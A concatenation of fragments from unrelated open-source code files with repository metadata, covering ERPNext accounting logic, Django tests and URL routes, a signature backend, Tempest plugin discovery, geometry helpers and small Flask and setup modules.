"DELETE FROM " + SUBTITLES_TABLE \
+ " WHERE " + SUB_MD_FK_KEY + "= ?;",
"DELETE METADATA PK" :
"DELETE FROM " + METADATA_TABLE \
+ " WHERE " + MD_ID_KEY + " = ?;",
"INSERT METADATA" :
"INSERT or IGNORE INTO " + METADATA_TABLE + " VALUES " \
+ "(NULL,?,?,?,?,?)",
"INSERT SUBTITLES" :
"INSERT INTO " + SUBTITLES_TABLE + " VALUES (?, ?, ?, ?);",
"SELECT SUBTITLES WITH PATH":
"SELECT sub." + SUB_MD_FK_KEY + ", sub." + SUB_LOCATION_KEY + ", sub." \
+ SUB_LANG_KEY + ", sub." + SUB_CHECKSUM_KEY \
+ ", m." + MD_PUBLISHER_KEY + ", m." + MD_INFOHASH_KEY \
+ " FROM " + METADATA_TABLE + " AS m " \
+"INNER JOIN " + SUBTITLES_TABLE + " AS sub "\
+ "ON m." + MD_ID_KEY + " = " + " sub." + SUB_MD_FK_KEY \
+ " WHERE " \
+ SUB_LOCATION_KEY + " IS NOT NULL;",
"SELECT SUBTITLES WITH PATH BY CHN INFO":
"SELECT sub." + SUB_LOCATION_KEY + ", sub." \
+ SUB_LANG_KEY + ", sub." + SUB_CHECKSUM_KEY \
+ " FROM " + METADATA_TABLE + " AS m " \
+"INNER JOIN " + SUBTITLES_TABLE + " AS sub "\
+ "ON m." + MD_ID_KEY + " = " + " sub." + SUB_MD_FK_KEY \
+ " WHERE sub." \
+ SUB_LOCATION_KEY + " IS NOT NULL" \
+ " AND m." + MD_PUBLISHER_KEY + " = ?"\
+ " AND m." + MD_INFOHASH_KEY + " = ?;" ,
"INSERT HAVE MASK":
"INSERT INTO " + SUBTITLES_HAVE_TABLE + " VALUES " \
+ "(?, ?, ?, ?);",
"GET ALL HAVE MASK":
"SELECT sh." + SH_PEER_ID_KEY + ", sh." + SH_HAVE_MASK_KEY \
+ ", sh." + SH_TIMESTAMP \
+ " FROM " + MD_SH_JOIN_CLAUSE + " WHERE md." + MD_PUBLISHER_KEY \
+ " = ? AND md." + MD_INFOHASH_KEY + " = ? "\
+ "ORDER BY sh." + SH_TIMESTAMP + " DESC" \
+ " LIMIT " + str(SH_RESULTS_LIMIT) + ";",
"GET ONE HAVE MASK":
"SELECT sh." + SH_HAVE_MASK_KEY \
+ ", sh." + SH_TIMESTAMP \
+ " FROM " + MD_SH_JOIN_CLAUSE + " WHERE md." + MD_PUBLISHER_KEY \
+ " = ? AND md." + MD_INFOHASH_KEY + " = ? AND sh." + SH_PEER_ID_KEY \
+ " = ?;",
"UPDATE HAVE MASK":
"UPDATE " + SUBTITLES_HAVE_TABLE \
+ " SET " + SH_HAVE_MASK_KEY + " = ?, " \
+ SH_TIMESTAMP + " = ?" \
+ " WHERE " + SH_PEER_ID_KEY + " = ?" \
+ " AND " + SH_MD_FK_KEY + " IN " \
+ "( SELECT + " + MD_ID_KEY+ " FROM " \
+ METADATA_TABLE + " WHERE + "\
+ MD_PUBLISHER_KEY + " = ?"\
+ " AND " + MD_INFOHASH_KEY + " = ? );",
"DELETE HAVE":
"DELETE FROM " + SUBTITLES_HAVE_TABLE \
+ " WHERE " + SH_PEER_ID_KEY + " = ?" \
+ " AND
|
" + SH_MD_FK_KEY + " IN " \
+ "( SELECT + " + MD_ID_KEY+ " FROM " \
+ METADATA_TABLE + " WHERE + "\
+ MD_PUBLISHER_KEY + " = ?"\
+ " AND " + MD_INFOHASH_KEY + " = ? );",
"CLEANUP OLD HAVE":
"DELETE FROM " + SUBTITLES_HAVE_TABLE \
+ " WHERE " + SH_TIMESTAMP + " < ? " \
+ " AND " +
|
SH_PEER_ID_KEY + " NOT IN " \
+ "( SELECT md." + MD_PUBLISHER_KEY + " FROM " \
+ METADATA_TABLE + " AS md W
|
joeirimpan/trytond-invoice-payment-gateway
|
tests/__init__.py
|
Python
|
bsd-3-clause
| 414
| 0.002415
|
# -*- coding: utf-8 -*-
import unittest
import trytond.tests.test_tryton
from test_invoice import TestInvoice
def suite():
"""
Define suite
"""
test_suite = trytond.tests.test_tryton.suite()
test_suite.addTests([
unittest.TestLoader().loa
|
dTestsFromTestCase(TestInvoice),
])
return
|
test_suite
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite())
|
bazz-erp/erpnext
|
erpnext/controllers/accounts_controller.py
|
Python
|
gpl-3.0
| 30,488
| 0.024829
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe, erpnext
from frappe import _, throw
from frappe.utils import today, flt, cint, fmt_mone
|
y, formatdate, getdate
from erpnext.setup.utils import get_exchange_rate
from erpnext.accounts.utils import get_fiscal_years, validate_fiscal_year, get_account_currency
from erpnext.utilities.transaction_base import TransactionBase
from erpnext.contr
|
ollers.recurring_document import convert_to_recurring, validate_recurring_document
from erpnext.controllers.sales_and_purchase_return import validate_return
from erpnext.accounts.party import get_party_account_currency, validate_party_frozen_disabled
from erpnext.exceptions import InvalidCurrency
force_item_fields = ("item_group", "barcode", "brand", "stock_uom")
class AccountsController(TransactionBase):
def __init__(self, arg1, arg2=None):
super(AccountsController, self).__init__(arg1, arg2)
@property
def company_currency(self):
if not hasattr(self, "__company_currency"):
self.__company_currency = erpnext.get_company_currency(self.company)
return self.__company_currency
def onload(self):
self.get("__onload").make_payment_via_journal_entry = frappe.db.get_single_value('Accounts Settings', 'make_payment_via_journal_entry')
def validate(self):
if self.get("_action") and self._action != "update_after_submit":
self.set_missing_values(for_validate=True)
self.validate_date_with_fiscal_year()
if self.meta.get_field("currency"):
self.calculate_taxes_and_totals()
if not self.meta.get_field("is_return") or not self.is_return:
self.validate_value("base_grand_total", ">=", 0)
validate_return(self)
self.set_total_in_words()
if self.doctype in ("Sales Invoice", "Purchase Invoice") and not self.is_return:
self.validate_due_date()
self.validate_advance_entries()
if self.meta.get_field("taxes_and_charges"):
self.validate_enabled_taxes_and_charges()
self.validate_party()
self.validate_currency()
if self.meta.get_field("is_recurring"):
if self.amended_from and self.recurring_id == self.amended_from:
self.recurring_id = None
if not self.get("__islocal"):
validate_recurring_document(self)
convert_to_recurring(self, self.get("posting_date") or self.get("transaction_date"))
if self.doctype == 'Purchase Invoice':
self.validate_paid_amount()
def before_print(self):
if self.doctype in ['Purchase Order', 'Sales Order']:
if self.get("group_same_items"):
self.group_similar_items()
def validate_paid_amount(self):
if hasattr(self, "is_pos") or hasattr(self, "is_paid"):
is_paid = self.get("is_pos") or self.get("is_paid")
if cint(is_paid) == 1:
if flt(self.paid_amount) == 0 and flt(self.outstanding_amount) > 0:
if self.cash_bank_account:
self.paid_amount = flt(flt(self.grand_total) - flt(self.write_off_amount),
self.precision("paid_amount"))
self.base_paid_amount = flt(self.paid_amount * self.conversion_rate, self.precision("base_paid_amount"))
else:
# show message that the amount is not paid
self.paid_amount = 0
frappe.throw(_("Note: Payment Entry will not be created since 'Cash or Bank Account' was not specified"))
else:
frappe.db.set(self,'paid_amount',0)
def on_update_after_submit(self):
if self.meta.get_field("is_recurring"):
validate_recurring_document(self)
convert_to_recurring(self, self.get("posting_date") or self.get("transaction_date"))
def set_missing_values(self, for_validate=False):
if frappe.flags.in_test:
for fieldname in ["posting_date","transaction_date"]:
if self.meta.get_field(fieldname) and not self.get(fieldname):
self.set(fieldname, today())
break
def calculate_taxes_and_totals(self):
from erpnext.controllers.taxes_and_totals import calculate_taxes_and_totals
calculate_taxes_and_totals(self)
if self.doctype in ["Quotation", "Sales Order", "Delivery Note", "Sales Invoice"]:
self.calculate_commission()
self.calculate_contribution()
def validate_date_with_fiscal_year(self):
if self.meta.get_field("fiscal_year") :
date_field = ""
if self.meta.get_field("posting_date"):
date_field = "posting_date"
elif self.meta.get_field("transaction_date"):
date_field = "transaction_date"
if date_field and self.get(date_field):
validate_fiscal_year(self.get(date_field), self.fiscal_year, self.company,
self.meta.get_label(date_field), self)
def validate_due_date(self):
from erpnext.accounts.party import validate_due_date
if self.doctype == "Sales Invoice":
if not self.due_date:
frappe.throw(_("Due Date is mandatory"))
validate_due_date(self.posting_date, self.due_date, "Customer", self.customer, self.company)
elif self.doctype == "Purchase Invoice":
validate_due_date(self.posting_date, self.due_date, "Supplier", self.supplier, self.company)
def set_price_list_currency(self, buying_or_selling):
if self.meta.get_field("posting_date"):
transaction_date = self.posting_date
else:
transaction_date = self.transaction_date
if self.meta.get_field("currency"):
# price list part
fieldname = "selling_price_list" if buying_or_selling.lower() == "selling" \
else "buying_price_list"
if self.meta.get_field(fieldname) and self.get(fieldname):
self.price_list_currency = frappe.db.get_value("Price List",
self.get(fieldname), "currency")
if self.price_list_currency == self.company_currency:
self.plc_conversion_rate = 1.0
elif not self.plc_conversion_rate:
self.plc_conversion_rate = get_exchange_rate(self.price_list_currency,
self.company_currency, transaction_date)
# currency
if not self.currency:
self.currency = self.price_list_currency
self.conversion_rate = self.plc_conversion_rate
elif self.currency == self.company_currency:
self.conversion_rate = 1.0
elif not self.conversion_rate:
self.conversion_rate = get_exchange_rate(self.currency,
self.company_currency, transaction_date)
def set_missing_item_details(self, for_validate=False):
"""set missing item values"""
from erpnext.stock.get_item_details import get_item_details
from erpnext.stock.doctype.serial_no.serial_no import get_serial_nos
if hasattr(self, "items"):
parent_dict = {}
for fieldname in self.meta.get_valid_columns():
parent_dict[fieldname] = self.get(fieldname)
if self.doctype in ["Quotation", "Sales Order", "Delivery Note", "Sales Invoice"]:
document_type = "{} Item".format(self.doctype)
parent_dict.update({"document_type": document_type})
for item in self.get("items"):
if item.get("item_code"):
args = parent_dict.copy()
args.update(item.as_dict())
args["doctype"] = self.doctype
args["name"] = self.name
if not args.get("transaction_date"):
args["transaction_date"] = args.get("posting_date")
if self.get("is_subcontracted"):
args["is_subcontracted"] = self.is_subcontracted
ret = get_item_details(args)
for fieldname, value in ret.items():
if item.meta.get_field(fieldname) and value is not None:
if (item.get(fieldname) is None or fieldname in force_item_fields):
item.set(fieldname, value)
elif fieldname in ['cost_center', 'conversion_factor'] and not item.get(fieldname):
item.set(fieldname, value)
elif fieldname == "serial_no":
stock_qty = item.get("stock_qty") * -1 if item.get("stock_qty") < 0 else item.get("stock_qty")
if stock_qty != len(get_serial_nos(item.get('serial_no'))):
item.set(fieldname, value)
elif fieldname == "conversion_factor" and not item.get("conversion_factor"):
item.set(fieldname, value)
if ret.get("pricing_rule"):
# if user changed the discount percentage then set user's discount percentage ?
item.set("discount_percentage", ret.get("discount_percentage"))
if ret.get("pricing_rule_for") == "Price":
item.set("pricing_list_rate", ret.get("pricing_list_rate"))
if item.price_list_rate:
item.ra
|
USGSDenverPychron/pychron
|
pychron/updater/branch_view.py
|
Python
|
apache-2.0
| 2,723
| 0.002571
|
# # ===============================================================================
# # Copyright 2015 Jake Ross
# #
# # Licensed under the Apache License, Version 2.0 (the "License");
# # you may not use this file except in compliance with the License.
# # You may obtain a copy of the License at
# #
# # http://www.apache.org/licenses/LICENSE-2.0
# #
# # Unless required by applicable law or agreed to in writing, software
# # distributed under the License is distributed on an "AS IS" BASIS,
# # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# # See the License for the specific language governing permissions and
# # limitations under the License.
# # ===============================================================================
#
# # ============= enthought library imports =======================
# from __future__ import absolute_import
# from traitsui.api import View, UItem, HGroup, VGroup
# from traitsui.editors.api import EnumEditor
# from traitsui.handler import Controller
# # ============= standard library imports ========================
# # ============= local library imports ==========================
# from pychron.envisage.icon_button_editor import icon_button_editor
#
#
# class NewBranchView(Controller):
# def traits_view(self):
# v = View(UItem('new_branch_name'),
# title='New Branch Name',
# width=300,
#
|
kind='livemodal',
# buttons=['OK', 'Cancel'])
# return v
#
#
# class ManageBran
|
chView(Controller):
# def traits_view(self):
# v = View(
# VGroup(
# VGroup(HGroup(UItem('branch', editor=EnumEditor(name='all_branches')),
# # icon_button_editor('build_button', 'bricks',
# # tooltip='Build selected branch and set as current application'),
# icon_button_editor('checkout_branch_button', 'bricks',
# tooltip='Checkout selected branch'),
# icon_button_editor('pull_button', 'arrow_down',
# tooltip='Update Branch'),
# show_border=True,
# label='Current Branch'))),
# # VGroup(UItem('edit_branch', editor=EnumEditor(name='branches')),
# # UItem('delete_button', enabled_when='delete_enabled'),
# # show_border=True)),
# title='Manage Branch View',
# buttons=['OK', 'Cancel'])
# return v
#
# # ============= EOF =============================================
|
Transkribus/TranskribusDU
|
TranskribusDU/util/geoTools.py
|
Python
|
bsd-3-clause
| 2,557
| 0.030504
|
from rtree import index
import numpy as np
#from shapely.prepared import prep
import shapely
def polygon2points(p):
"""
convert a polygon to a sequence of points for DS documents
:param p: shapely.geometry.Polygon
returns a string representing the set of points
"""
return ",".join(list("%s,%s"%(x,y) for x,y in p.exterior.coords))
def sPoints2tuplePoints(s):
"""
convert a string (from DSxml) to a polygon
:param s: string = 'x,y x,y...'
returns a list of (x, y) tuples
"""
# lList = s.split(',')
# return [(float(x),float(y)) for x,y in zip(lList[0::2],lList[1::2])]
return [(float(x), float(y)) for x, y in (sxy.split(',') for sxy in s.split(' '))]
def iuo(z1,z2):
"""
intersection over
|
union
:param z1: polygon
:param z2: polygon
returns z1.intersection(z2).area / z1.union(z2).area
"""
assert z1.is_valid
assert z2.is_valid
return z1.intersection(z2).area / z1.union(z2).area
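# Hedged worked example: for unit squares [0,1]^2 and [0.5,1.5]^2 the
# intersection area is 0.25 and the union area is 1.75, so iuo returns
# 0.25 / 1.75 (about 0.143).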
def populateGeo(lZones: list, lElements: list):
"""
assign each element of lElements to the zone in lZones with argmax(overlap(elt, zone))
"""
lIndElements = index.Index()
|
dPopulated = {}
for pos, z in enumerate(lZones):
# lIndElements.insert(pos, cell.toPolygon().bounds)
# print (cell,cell.is_valid,cell.bounds)
lIndElements.insert(pos, z.bounds)
aIntersection = np.zeros((len(lElements),len(lZones)),dtype=float)
for j,elt in enumerate(lElements):
ll = lIndElements.intersection(elt.bounds)
for x in ll:
try:aIntersection[j][x] = elt.intersection(lZones[x]).area
except shapely.errors.TopologicalError: pass #This operation could not be performed. Reason: unknown
for i,e in enumerate(lElements):
best = np.argmax(aIntersection[i])
# aIntersection == np.zeros : empty
if aIntersection[i][best]>0:
try: dPopulated[best].append(i)
except KeyError:dPopulated[best] = [i]
return dPopulated
if __name__ == "__main__":
# def test_geo():
from shapely.geometry import Polygon
lP= []
for i in range(0,100,10):
lP.append(Polygon(((i,i),(i,i+10),(i+10,i+10),(i+10,i))))
# print (lP[-1])
lE= []
for i in range(0,100,5):
lE.append(Polygon(((i,i),(i,i+9),(i+9,i+9),(i+9,i))))
# print (lE[-1])
dres = populateGeo(lP,lE)
for item in dres:
print (lE[item],[lE[x].wkt for x in dres[item]])
# print(polygon2points(lP[0]))
|
miceno/django-categories
|
categories/tests/test_admin.py
|
Python
|
apache-2.0
| 1,919
| 0.001563
|
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import Client, TestCase
from categories.models import Category
class TestCategoryAdmin(Tes
|
tCase):
def setUp(self):
self.client = Client()
def test_adding_parent_and_child(self):
User.objects.create_superuser('testuser', 'testuser@example.com', 'password')
self.client.login(username='testuser', password='password')
url = reverse('admin:categories_category_add')
data = {
'parent': '',
'name': "Parent",
'thumbnail': '',
'filename': '',
'active': 'on',
|
'alternate_title': '',
'alternate_url': '',
'description': '',
'meta_keywords': '',
'meta_extra': '',
'order': 0,
'slug': 'parent',
'_save': '_save',
}
resp = self.client.post(url, data=data)
self.assertEqual(resp.status_code, 302)
self.assertEqual(1, Category.objects.count())
# update parent
data.update({'name': 'Parent (Changed)'})
resp = self.client.post(reverse('admin:categories_category_change', args=(1,)), data=data)
self.assertEqual(resp.status_code, 302)
self.assertEqual(1, Category.objects.count())
# add a child
data.update({
'parent': '1',
'name': 'Child',
'slug': 'child',
})
resp = self.client.post(url, data=data)
self.assertEqual(resp.status_code, 302)
self.assertEqual(2, Category.objects.count())
# update child
data.update({'name': 'Child (Changed)'})
resp = self.client.post(reverse('admin:categories_category_change', args=(2,)), data=data)
self.assertEqual(resp.status_code, 302)
self.assertEqual(2, Category.objects.count())
|
novafloss/django-anysign
|
django_anysign/backend.py
|
Python
|
bsd-3-clause
| 5,255
| 0
|
"""Base material for signature backends."""
from django.urls import reverse
class SignatureBackend(object):
"""Encapsulate signature workflow and integration with vendor backend.
Here is a typical workflow:
* :class:`~django_anysign.models.SignatureType` instance is created. It
encapsulates the backend type and its configuration.
* A :class:`~django_anysign.models.Signature` instance is created.
The signature instance has a signature type attribute, hence a backend.
* Signers are notified, by email, text or whatever. They get a hyperlink
to the "signer view". The URL may vary depending on the signature
backend.
* A signer goes to the backend's "signer view" entry point: typically a
view that integrates backend specific form to sign a document.
* Most backends have a "notification view", for the third-party service to
signal updates.
* Most backends have a "signer return view", where the signer is redirected
when they end the signature process (whatever the signature status).
* The backend's specific workflow can be made of several views. At the
beginning, there is a Signature instance which carries data (typically a
document). At the end, Signature is done.
"""
def __init__(self, name, code, url_namespace='anysign', **kwargs):
"""Configure backend."""
#: Human-readable name.
self.name = name
#: Machine-readable name. Should be lowercase alphanumeric only, i.e.
#: PEP-8 compliant.
self.code = code
#: Namespace for URL resolution.
self.url_namespace = url_namespace
def send_signature(self, signature):
"""Initiate the signature process.
At this state, the signature object has been configured.
Typical implementation consists in sending signer URL to first signer.
Raise ``NotImplementedError`` if the backend does not support such a
feature.
"""
raise NotImplementedError()
def get_signer_url(self, signer):
"""Return URL where signer signs document.
Raise ``NotImplementedError`` in case the backend does not support
"signer view" feature.
Default implementation reverses :meth:`get_signer_url_name` with
``signer.pk`` as argument.
"""
return reverse(self.get_signer_url_name(), args=[signer.pk])
def get_signer_url_name(self):
"""Return URL name where signer signs document.
Raise ``NotImplementedError`` i
|
n case the backend does not support
"signer view" feature.
Default implementation returns ``anysign:signer``.
|
"""
return '{ns}:signer'.format(ns=self.url_namespace)
def get_signer_return_url(self, signer):
"""Return absolute URL where signer is redirected after signing.
The URL must be **absolute** because it is typically used by external
signature service: the signer uses external web UI to sign the
document(s) and then the signature service redirects the signer to
(this) `Django` website.
Raise ``NotImplementedError`` in case the backend does not support
"signer return view" feature.
Default implementation reverses :meth:`get_signer_return_url_name`
with ``signer.pk`` as argument.
"""
return reverse(
self.get_signer_return_url_name(),
args=[signer.pk])
def get_signer_return_url_name(self):
"""Return URL name where signer is redirected once document has been
signed.
Raise ``NotImplementedError`` in case the backend does not support
"signer return view" feature.
Default implementation returns ``anysign:signer_return``.
"""
return '{ns}:signer_return'.format(ns=self.url_namespace)
def get_signature_callback_url(self, signature):
"""Return URL where backend can post signature notifications.
Raise ``NotImplementedError`` in case the backend does not support
"signature callback url" feature.
Default implementation reverses :meth:`get_signature_callback_url_name`
with ``signature.pk`` as argument.
"""
return reverse(
self.get_signature_callback_url_name(),
args=[signature.pk])
def get_signature_callback_url_name(self):
"""Return URL name where backend can post signature notifications.
Raise ``NotImplementedError`` in case the backend does not support
"signer return view" feature.
Default implementation returns ``anysign:signature_callback``.
"""
return '{ns}:signature_callback'.format(ns=self.url_namespace)
def create_signature(self, signature):
"""Register ``signature`` in backend, return updated object.
This method is typically called by views which create
:class:`~django_anysign.models.Signature` instances.
If the backend stores a signature object, then the implementation should update
:attr:`~django_anysign.models.Signature.signature_backend_id`.
Base implementation does nothing: override this method in backends.
"""
return signature
|
cisco-openstack/tempest
|
tools/generate-tempest-plugins-list.py
|
Python
|
apache-2.0
| 4,796
| 0
|
#! /usr/bin/env python
# Copyright 2016 Hewlett Packard Enterprise Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# This script is intended to be run as part of a periodic proposal bot
# job in OpenStack infrastructure.
#
# In order to function correctly, the environment in which the
# script runs must have
# * network access to the review.opendev.org Gerrit API
# working directory
# * network access to https://opendev.org/openstack
import json
import re
import sys
import urllib3
from urllib3.util import retry
# List of projects having tempest plugin stale or unmaintained for a long time
# (6 months or more)
# TODO(masayukig): Some of these can be removed from BLACKLIST in the future
# when the patches are merged.
BLACKLIST = [
'x/gce-api', # It looks gce-api doesn't support python3 yet.
'x/glare', # To avoid sanity-job failure
'x/group-based-policy', # It looks this doesn't support python3 yet.
'x/intel-nfv-ci-tests', # https://review.opendev.org/#/c/634640/
'openstack/networking-generic-switch',
# https://review.opendev.org/#/c/634846/
'openstack/networking-l2gw-tempest-plugin',
# https://review.opendev.org/#/c/635093/
'openstack/networking-midonet', # https://review.opendev.org/#/c/635096/
'x/networking-plumgrid', # https://review.opendev.org/#/c/635096/
'x/networking-spp', # https://review.opendev.org/#/c/635098/
'openstack/neutron-dynamic-routing',
# https://review.opendev.org/#/c/637718/
'openstack/neutron-vpnaas', # https://review.opendev.org/#/c/637719/
'x/tap-as-a-service', # To avoid sanity-job failure
'x/valet', # https://review.opendev.org/#/c/638339/
'x/kingbird', # https://bugs.launchpad.net/kingbird/+bug/1869722
# vmware-nsx is blacklisted since https://review.opendev.org/#/c/736952
'x/vmware-nsx-tempest-plugin',
]
url = 'https://review.opendev.org/projects/'
# This is what a project looks like
'''
"openstack-attic/akanda": {
"id": "openstack-attic%2Fakanda",
"state": "READ_ONLY"
},
'''
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED')
retries = retry.Retry(status_forcelist=[500], backoff_factor=1.0)
def has_tempest_plugin(proj):
try:
r = http.request('GET', "https://opendev.org/%s/raw/branch/"
"master/setup.cfg" % proj, retries=retries)
if r.status == 404:
return False
except urllib3.exceptions.MaxRetryError as err:
# We should not ignore non 404 errors.
raise err
p = re.compile(r'^tempest\.test_plugins', re.M)
if p.findall(r.data.decode('utf-8')):
return True
else:
return False
if len(sys.argv) > 1 and sys.argv[1] == 'blacklist':
for black_plugin in BLACKLIST:
print(black_plugin)
# We just need BLACKLIST when we use this `blacklist` option.
# So, this exits here.
sys.exit()
r = http.request('GET', url, retries=retries)
# Gerrit prepends 4 garbage octets to the JSON, in order to counter
# cross-site scripting attacks. Therefore we must discard it so the
# json library won't choke.
content = r.data.decode('utf-8')[4:]
projects = sorted(json.loads(content))
# Retrieve projects having no deployment tool repo (such as deb,
# puppet, ansible, etc.), infra repos, ui or spec namespace as those
namespaces do not contain tempest plugins.
projects_list = [i for i in projects if not (
i.startswith('openstack-dev/') or
i.startswith('openstack-infra/') or
i.startswith('openstack/ansible-') or
i.startswith('openstack/charm-') or
i.startswith('openstack/cookbook-openstack-') or
i.startswith('openstack/devstack-') or
i.startswith('openstack/fuel-') or
i.startswith('openstack/deb-') or
i.startswith('openstack/puppet-') or
i.startswith('openstack/openstack-ansible-') or
i.startswith('x/deb-') or
i.startswith('x/fuel-') or
i.startswith('x/python-') or
i.startswith('zuul/') or
i.endswith('-ui') or
i.endswith('-specs'))]
found_plugins = list(filter(has_tempest_plugin, projects_
|
list))
# We have tempest plugins not only in 'openstack/' n
|
amespace but also the
# other name spaces such as 'airship/', 'x/', etc.
# So, we print all of them here.
for project in found_plugins:
print(project)
|
lessthanoptimal/PyBoof
|
examples/scene_recognition.py
|
Python
|
apache-2.0
| 2,120
| 0.00283
|
#!/usr/bin/env python3
import glob
import numpy as np
import pyboof as pb
# Scene recognition is defined here as the problem where you wish to find multiple views of the same scene.
# In this example we will load a set of images that contains sets of 3 related images. We will tell it to find the 5
# most similar images so that you can see what it does when it fails to find a good match.
# Get a list of all images which we wish to search
list_images = list(glob.glob("../data/example/recognition/scene/*.jpg"))
list_images.sort()
# Create an instance of SceneRecognition. This will take in images as input
recognizer = pb.FactorySceneRecognition(np.uint8).scene_recognition()
# First we need to create a model so that it knows how to describe an image. BoofCV does provide a
# pre-built model generated from vacation photos. Training is fast enough that often it's just easier to train it
# on the images you plan to search.
print("Learning the model. This can take a moment or two.")
recognizer.learn_model(list_images)
# Alternatively you can comment out the code above (lines 18 to 24) and load
# a pre-built model by uncommenting the line below
# recognizer = pb.download_default_scene_recognition(np.uint8, "saved_models")
# Now add all the images that we wish to look up
print("Adding images to the database")
for image_file in list_images:
boof_gray = pb.load_single_band(image_file, np.uint8)
recognizer.add_image(image_file, boof_gray)
# Let's look one up and see which images are related
print("Making a query: ", list_images[6])
query_image = pb.load_single_band(list_images[6], np.uint8)
found_matches = recognizer.query(query_image, 5)
# We are expecting 3 matches to be first, then the other two will be incorrect/noise
print("len={}".format(len(found_matches)))
print("\nResults:")
for m in found_matches:
print("{:s} error={:f}".format(m["id"], m[
|
"error"]))
# Display the results
image_list = [(query_image, "Query")]
for m in found_matche
|
s:
image_list.append((pb.load_planar(m["id"], np.uint8), m["id"]))
pb.swing.show_list(image_list, title="Query Results")
input("Press any key to exit")
|
HimmelStein/lg-flask
|
models.py
|
Python
|
mit
| 578
| 0.00173
|
from app import db
from sqlalchemy.dialects.postgresql import JSON
class ChBible(db.Mo
|
del):
__tablename__ = 'chbible'
id = db.Column(db.Integer, primary_key=True)
bbid = db.Column(db.String())
snt = db.Column(db.String())
snt_lg = db.Column(db.String())
snt_sdg = db.Column(db.String(
|
))
def __init__(self, bbid, snt, snt_lg, snt_sdg):
self.bbid = bbid
self.snt = snt
self.snt_lg = snt_lg
self.snt_sdg = snt_sdg
def __repr__(self):
return '<id {0}> <{1}> {2}\n'.format(self.id, self.bbid, self.snt)
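# Hedged usage sketch (requires an application context and a configured
# Flask-SQLAlchemy session; the values are illustrative assumptions):
#   row = ChBible(bbid='gen.1.1', snt='...', snt_lg='...', snt_sdg='...')
#   db.session.add(row)
#   db.session.commit()
#   first = ChBible.query.filter_by(bbid='gen.1.1').first()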
|
sharkspeed/dororis
|
packages/python/flask/flask-dog-book/7-chapter/app/main/__init__.py
|
Python
|
bsd-2-clause
| 143
| 0.006993
|
#!/usr/bin/env pytho
|
n
# -*- coding: utf-8 -*-
from flask import Blueprint
main = Blueprint('main', __name__)
from . import views, erro
|
rs
|
BurtBiel/autorest
|
AutoRest/Generators/Python/Azure.Python.Tests/Expected/AcceptanceTests/AzureResource/setup.py
|
Python
|
mit
| 1,161
| 0
|
# coding=utf
|
-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# coding: utf-8
from set
|
uptools import setup, find_packages
NAME = "autorestresourceflatteningtestservice"
VERSION = "1.0.0"
# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools
REQUIRES = ["msrest>=0.2.0", "msrestazure>=0.2.1"]
setup(
name=NAME,
version=VERSION,
description="AutoRestResourceFlatteningTestService",
author_email="",
url="",
keywords=["Swagger", "AutoRestResourceFlatteningTestService"],
install_requires=REQUIRES,
packages=find_packages(),
include_package_data=True,
long_description="""\
Resource Flattening for AutoRest
"""
)
|
seewindcn/tortoisehg
|
src/tortoisehg/util/hgversion.py
|
Python
|
gpl-2.0
| 1,003
| 0.000997
|
# hgversion.py - Version information for Mercurial
#
# Copyright 2009 Steve Borho <steve@borho.org>
#
# This software may b
|
e used and distributed according to the terms of the
# GNU General Public Licen
|
se version 2, incorporated herein by reference.
import re
try:
# post 1.1.2
from mercurial import util
hgversion = util.version()
except AttributeError:
# <= 1.1.2
from mercurial import version
hgversion = version.get_version()
testedwith = '3.6 3.7'
def checkhgversion(v):
"""range check the Mercurial version"""
reqvers = testedwith.split()
v = v.split('+')[0]
if not v or v == 'unknown' or len(v) >= 12:
# can't make any intelligent decisions about unknown or hashes
return
vers = re.split(r'\.|-', v)[:2]
if len(vers) < 2:
return
if '.'.join(vers) in reqvers:
return
return ('This version of TortoiseHg requires Mercurial version %s.n to '
'%s.n, but found %s') % (reqvers[0], reqvers[-1], v)
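# Hedged examples of the range check above (inputs chosen for illustration):
#   checkhgversion('3.6.1+20160101')  -> None (3.6 is within testedwith)
#   checkhgversion('unknown')         -> None (no intelligent decision possible)
#   checkhgversion('3.5')             -> error string (outside 3.6..3.7)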
|
F483/bikesurf.org
|
apps/account/urls.py
|
Python
|
mit
| 928
| 0.017241
|
# -*- coding: utf-8 -*-
# Copyright (c) 2012 Fabian Barkhau <fabian.barkhau@gmail.com>
# License: MIT (see LICENSE.TXT file)
from django.conf.urls import patterns, include, url
from apps.common.urls import arg_id, arg_slug, arg_username
L = arg_id(
|
"link_id")
U = arg_username("username")
urlpatterns = patterns("apps.account.views",
url(r"^account/profile$", "profile"),
url(r"^account/view/%s$" % U, "view"),
url(r"^account/set_passport$", "set_passport", { "wizard" : False }),
url(r"^account/edit$",
|
"edit", { "wizard" : False }),
url(r"^account/link/create$", "link_create"),
url(r"^account/link/delete/%s$" % L, "link_delete"),
# this url because allauth
url(r"^accounts/profile/$", "edit", { "wizard" : True }),
url(r"^account/wiz/passport", "set_passport", { "wizard" : True }),
)
|
smitchell556/cuttle
|
cuttle/__init__.py
|
Python
|
mit
| 137
| 0
|
#
|
-*- coding: utf-8 -*-
"""
Cuttle, the simple, extendable ORM.
:license: MIT, see LICENSE for details.
"""
__versi
|
on__ = '0.9.0.dev'
|
release-monitoring/anitya
|
anitya/tests/lib/backends/test_npmjs.py
|
Python
|
gpl-2.0
| 9,246
| 0.000108
|
# -*- coding: utf-8 -*-
#
# Copyright © 2014-2019 Red Hat, Inc.
#
# This copyrighted materi
|
al is made available to anyone wishing to use,
# modify, copy, or redistribute it subje
|
ct to the terms and conditions
